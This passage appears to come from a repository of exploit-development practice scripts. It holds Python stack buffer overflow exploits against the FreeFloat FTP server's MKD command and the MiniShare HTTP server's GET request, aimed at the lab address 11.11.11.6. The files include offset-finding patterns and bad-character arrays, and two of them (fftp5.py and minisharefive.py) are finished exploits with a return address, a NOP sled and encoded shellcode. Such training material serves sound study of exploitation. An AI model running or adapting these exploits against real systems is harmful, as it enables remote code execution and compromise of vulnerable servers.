badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | evil = "A" * 247 + "B" * 4 + "\x90" * 4 + badchars 24 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | connect=s.connect(('11.11.11.6',21)) 26 | s.recv(1024) 27 | s.send('USER anonymous\r\n') 28 | s.recv(1024) 29 | s.send('PASS anonymous\r\n') 30 | s.recv(1024) 31 | s.send('MKD ' + evil + '\r\n') 32 | s.recv(1024) 33 | s.send('QUIT\r\n') 34 | s.close 35 | 36 | -------------------------------------------------------------------------------- /second/freefloatftp/fftp4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | # \x00 \x0a \x0d 5 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 6 | #[*] Exact match at offset 247 7 | 8 | #0x7E429353 9 | ret = "\x53\x93\x42\7e" 10 | evil = "A" * 247 + ret + shellcode 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | connect=s.connect(('11.11.11.6',21)) 13 | s.recv(1024) 14 | s.send('USER anonymous\r\n') 15 | s.recv(1024) 16 | s.send('PASS anonymous\r\n') 17 | s.recv(1024) 18 | s.send('MKD ' + evil + '\r\n') 19 | s.recv(1024) 20 | s.send('QUIT\r\n') 21 | s.close 22 | 23 | -------------------------------------------------------------------------------- /second/freefloatftp/fftp5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | # \x00 \x0a \x0d 5 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 6 | #[*] Exact match at offset 247 7 | shellcode = ("\xba\xdc\xe0\x98\x72\xdb\xcd\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" 8 | "\x53\x31\x53\x12\x83\xc3\x04\x03\x8f\xee\x7a\x87\xd3\x07\xf8" 9 | "\x68\x2b\xd8\x9d\xe1\xce\xe9\x9d\x96\x9b\x5a\x2e\xdc\xc9\x56" 10 | "\xc5\xb0\xf9\xed\xab\x1c\x0e\x45\x01\x7b\x21\x56\x3a\xbf\x20" 11 | "\xd4\x41\xec\x82\xe5\x89\xe1\xc3\x22\xf7\x08\x91\xfb\x73\xbe" 12 | "\x05\x8f\xce\x03\xae\xc3\xdf\x03\x53\x93\xde\x22\xc2\xaf\xb8" 13 | "\xe4\xe5\x7c\xb1\xac\xfd\x61\xfc\x67\x76\x51\x8a\x79\x5e\xab" 14 | "\x73\xd5\x9f\x03\x86\x27\xd8\xa4\x79\x52\x10\xd7\x04\x65\xe7" 15 | "\xa5\xd2\xe0\xf3\x0e\x90\x53\xdf\xaf\x75\x05\x94\xbc\x32\x41" 16 | "\xf2\xa0\xc5\x86\x89\xdd\x4e\x29\x5d\x54\x14\x0e\x79\x3c\xce" 17 | "\x2f\xd8\x98\xa1\x50\x3a\x43\x1d\xf5\x31\x6e\x4a\x84\x18\xe7" 18 | "\xbf\xa5\xa2\xf7\xd7\xbe\xd1\xc5\x78\x15\x7d\x66\xf0\xb3\x7a" 19 | "\x89\x2b\x03\x14\x74\xd4\x74\x3d\xb3\x80\x24\x55\x12\xa9\xae" 20 | "\xa5\x9b\x7c\x5a\xad\x3a\x2f\x79\x50\xfc\x9f\x3d\xfa\x95\xf5" 21 | "\xb1\x25\x85\xf5\x1b\x4e\x2e\x08\xa4\x61\xf3\x85\x42\xeb\x1b" 22 | "\xc0\xdd\x83\xd9\x37\xd6\x34\x21\x12\x4e\xd2\x6a\x74\x49\xdd" 23 | "\x6a\x52\xfd\x49\xe1\xb1\x39\x68\xf6\x9f\x69\xfd\x61\x55\xf8" 24 | "\x4c\x13\x6a\xd1\x26\xb0\xf9\xbe\xb6\xbf\xe1\x68\xe1\xe8\xd4" 25 | "\x60\x67\x05\x4e\xdb\x95\xd4\x16\x24\x1d\x03\xeb\xab\x9c\xc6" 26 | "\x57\x88\x8e\x1e\x57\x94\xfa\xce\x0e\x42\x54\xa9\xf8\x24\x0e" 27 | "\x63\x56\xef\xc6\xf2\x94\x30\x90\xfa\xf0\xc6\x7c\x4a\xad\x9e" 28 | "\x83\x63\x39\x17\xfc\x99\xd9\xd8\xd7\x19\xe9\x92\x75\x0b\x62" 29 | "\x7b\xec\x09\xef\x7c\xdb\x4e\x16\xff\xe9\x2e\xed\x1f\x98\x2b" 30 | "\xa9\xa7\x71\x46\xa2\x4d\x75\xf5\xc3\x47") 31 | #0x7E429353 32 | ret = "\x53\x93\x42\x7e" 33 | evil = "A" * 247 + ret + "\x90" * 16 + shellcode 34 | 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | connect=s.connect(('11.11.11.6',21)) 37 | s.recv(1024) 38 | s.send('USER anonymous\r\n') 39 | s.recv(1024) 40 | s.send('PASS anonymous\r\n') 41 | s.recv(1024) 42 | s.send('MKD ' + evil + '\r\n') 43 | s.recv(1024) 44 | s.send('QUIT\r\n') 45 | s.close 46 | 47 | -------------------------------------------------------------------------------- /second/minishare/minisharefive.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | #\x0b \x0d \x00 7 | #[*] Exact match at offset 1787 8 | #buff+="A"*2000 9 | #buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 10 | #ret0x7e429353 11 | #ret = 12 | 13 | shellcode = ("\xda\xd9\xd9\x74\x24\xf4\x5e\xbf\x71\x7c\x0e\x9c\x29\xc9\xb1" 14 | "\x53\x31\x7e\x17\x83\xee\xfc\x03\x0f\x6f\xec\x69\x13\x67\x72" 15 | "\x91\xeb\x78\x13\x1b\x0e\x49\x13\x7f\x5b\xfa\xa3\x0b\x09\xf7" 16 | "\x48\x59\xb9\x8c\x3d\x76\xce\x25\x8b\xa0\xe1\xb6\xa0\x91\x60" 17 | "\x35\xbb\xc5\x42\x04\x74\x18\x83\x41\x69\xd1\xd1\x1a\xe5\x44" 18 | "\xc5\x2f\xb3\x54\x6e\x63\x55\xdd\x93\x34\x54\xcc\x02\x4e\x0f" 19 | "\xce\xa5\x83\x3b\x47\xbd\xc0\x06\x11\x36\x32\xfc\xa0\x9e\x0a" 20 | "\xfd\x0f\xdf\xa2\x0c\x51\x18\x04\xef\x24\x50\x76\x92\x3e\xa7" 21 | "\x04\x48\xca\x33\xae\x1b\x6c\x9f\x4e\xcf\xeb\x54\x5c\xa4\x78" 22 | "\x32\x41\x3b\xac\x49\x7d\xb0\x53\x9d\xf7\x82\x77\x39\x53\x50" 23 | "\x19\x18\x39\x37\x26\x7a\xe2\xe8\x82\xf1\x0f\xfc\xbe\x58\x58" 24 | "\x31\xf3\x62\x98\x5d\x84\x11\xaa\xc2\x3e\xbd\x86\x8b\x98\x3a" 25 | "\xe8\xa1\x5d\xd4\x17\x4a\x9e\xfd\xd3\x1e\xce\x95\xf2\x1e\x85" 26 | "\x65\xfa\xca\x30\x6d\x5d\xa5\x26\x90\x1d\x15\xe7\x3a\xf6\x7f" 27 | "\xe8\x65\xe6\x7f\x22\x0e\x8f\x7d\xcd\x21\x0c\x0b\x2b\x2b\xbc" 28 | "\x5d\xe3\xc3\x7e\xba\x3c\x74\x80\xe8\x14\x12\xc9\xfa\xa3\x1d" 29 | "\xca\x28\x84\x89\x41\x3f\x10\xa8\x55\x6a\x30\xbd\xc2\xe0\xd1" 30 | "\x8c\x73\xf4\xfb\x66\x17\x67\x60\x76\x5e\x94\x3f\x21\x37\x6a" 31 | "\x36\xa7\xa5\xd5\xe0\xd5\x37\x83\xcb\x5d\xec\x70\xd5\x5c\x61" 32 | "\xcc\xf1\x4e\xbf\xcd\xbd\x3a\x6f\x98\x6b\x94\xc9\x72\xda\x4e" 33 | "\x80\x29\xb4\x06\x55\x02\x07\x50\x5a\x4f\xf1\xbc\xeb\x26\x44" 34 | "\xc3\xc4\xae\x40\xbc\x38\x4f\xae\x17\xf9\x7f\xe5\x35\xa8\x17" 35 | "\xa0\xac\xe8\x75\x53\x1b\x2e\x80\xd0\xa9\xcf\x77\xc8\xd8\xca" 36 | "\x3c\x4e\x31\xa7\x2d\x3b\x35\x14\x4d\x6e") 37 | 38 | buff += "A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode 39 | 40 | buff+=" HTTP/1.1\r\n\r\n" 41 | s.send(buff) 42 | s.close() 43 | 44 | -------------------------------------------------------------------------------- /second/minishare/minisharefour.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | #\x0b \x0d 7 | #[*] Exact match at offset 1787 8 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0c\x0e\x0f\x10" 9 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 10 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 11 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 13 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 14 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 15 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 16 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 17 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 18 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 19 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 20 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 21 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 22 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 23 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 24 | #buff+="A"*2000 25 | #buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 26 | buff+="A"*1787 + "B" * 4 + badchars 27 | 28 | buff+=" HTTP/1.1\r\n\r\n" 29 | s.send(buff) 30 | s.close() 31 | 32 | -------------------------------------------------------------------------------- /second/minishare/minishareone.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | buff+="A"*2000 7 | buff+=" HTTP/1.1\r\n\r\n" 8 | s.send(buff) 9 | s.close() 10 | 11 | -------------------------------------------------------------------------------- /second/minishare/minisharethree.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | import socket,sys 3 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4 | s.connect(('11.11.11.6',80)) 5 | buff="GET " 6 | 7 | #[*] Exact match at offset 1787 8 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 9 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 10 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 11 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 13 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 14 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 15 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 16 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 17 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 18 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 19 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 20 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 21 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 22 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 23 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 24 | #buff+="A"*2000 25 | 